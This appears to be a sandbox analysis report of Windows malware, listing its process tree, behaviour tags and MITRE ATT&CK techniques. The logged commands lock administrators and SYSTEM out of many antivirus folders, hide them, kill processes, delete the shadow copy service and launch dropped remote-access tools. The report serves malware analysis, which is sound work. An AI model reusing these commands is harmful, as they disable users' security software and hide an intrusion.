C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.batDrops file in Drivers directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /FKills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /FKills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\WindowsViews/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM iediagcmd.exe /T /FKills process with taskkill
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\360\Total Security"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurityViews/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safeViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\AviraViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESETViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\Malwarebytes"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\MB3Install"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\KVRT_Data"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Indus"Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\WINDOWS\McMwt"Drops file in Windows directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\timeout.exetimeout 1Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Intel"Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Check"Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Temp"Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv
-
C:\Windows\SysWOW64\sc.exesc delete swprv
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exeExecutes dropped EXESuspicious use of AdjustPrivilegeTokenSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /trayExecutes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exeExecutes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /trayExecutes dropped EXESuspicious behavior: SetClipboardViewer
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exeChecks SCSI registry key(s)Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermServiceLoads dropped DLL
Network
MITRE ATT&CK Matrix
Collection
Data from Local System
5Command and Control
Credential Access
Credentials in Files
5Defense Evasion
Disabling Security Tools
3Web Service
1Modify Registry
9Hidden Files and Directories
3File Permissions Modification
1Discovery
Query Registry
3System Information Discovery
5Peripheral Device Discovery
1Execution
Command-Line Interface
1